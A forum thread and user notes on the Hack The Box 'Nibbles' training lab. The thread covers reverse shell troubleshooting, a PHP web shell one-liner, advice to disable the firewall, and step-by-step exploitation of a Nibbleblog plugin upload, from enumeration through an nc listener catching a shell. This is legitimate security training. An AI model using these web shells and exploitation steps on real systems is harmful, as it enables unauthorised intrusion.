Hi guys,
I have problems with the guied Nibbles machine. When I try to make the rce connection with the reverse shell; I don’t succeed with the connection but it doesn’t give me any error.
I share screenshots.
EDIT: I try it also with metasploit but gives me this error.
It could be that nc is not installed on the target host. Maybe try starting with a simple php shell? Something like:
<?php system($_GET['cmd']); ?>
Then do some system enumeration and try to get a better shell. If the above does not work, something is wrong with your payload delivery.
Oooh okay. I assume that nc was installed because it’s a guided machine.
I will try with another shells payloads.
Thanks
hi, have you solved this problem? The problem I encountered is the same as yours, and i have tried many methods but still have no idea . 
hey,I found the reason! my ip number is wrong. I used the academic workstation.When i use ‘ifconfig’ ,it show the ip which is cant be connected! The right listen ip is just on the bash window.(nooo) I hope it can help anyone else to save hours!!! 
sorry for the delay, my problem was cause my default firewall of ubuntu was rejecting the reverse shells. I recommend you to use a pentest distro or disable the firewall.
try different msf shell payloads , disable UFW firewall or if want disable them add A TABLE which rules that exlude a x IP (your ip) from x tcp por to y tcp something like :
sudo ufw allow from <>yourip/or/tun0</> proto tcp to any port
** then the commands depends pretty much on the UFW version
*** if on u put like 9292 from 0-9292 ufw enable all the port from 9292 and block all the port after 9292 … ,
Exercise notes:
1). Gain a foothold on the target and submit the user.txt flag
nmap < target ip >
http://< target ip >
http://< target ip >/< nibbleblog >
gobuster dir -u http://< target ip >/nibbleblog --wordlist /usr/share/dirb/wordlists/common.txt
Note: Gobuster runs a bunch of words against the directories. The wordlist argument (-w) provides the path to the wordlist. In the command above, the wordlist is pre-installed.
http://< target ip >/nibbleblog/admin/
http://< target ip >/nibbleblog/content/
pwd
curl -s http://< target ip >/nibbleblog/content/private/users.xml | xmllint --format -
Note: The extension at the end is an argument. A list of curl arguments, here: < curl - How To Use >
Note: Tried to do curl -s http://< target ip > /nibbleblog/content/private/users.xml --output-dir “/home/<hack the box account number/” to no avail.
Note: In the hack the box walk-through the writer uses:
gobuster dir -u http://< target ip >/ --wordlist /usr/share/dirb/wordlists/common.txt to check for additional directories. The writer states, “no other additional directories exist,” after the command. The statement appears more valid than not because the writer used the first Gobuster directory search on the http://< target ip >/, not the root of the web-application.
Note: Could try password cracking with Hashcat or CeWL.
http://< target ip >/nibbleblog/admin.php
Plugins
ip addr show dev tun0
Right click on home screen of the Hack the Box Terminal
Browse
sudo nc -lvnp < port of ip addr show dev tun0 >
http://< target ip >/nibbleblog/content/private/plugins/my_image/image.php
IN TERMINAL:
Should see:
"Ncat: Connection from 10.129.237.106.
Ncat: Connection from 10.129.237.106:57772.
/bin/sh: 0: can’t access tty; job control turned off," in home terminal.
Question(s):
What are the python commands doing?:
Looks like the last one gave us capabilities to run bash commands, such as ‘cd ~’; but I am unsure?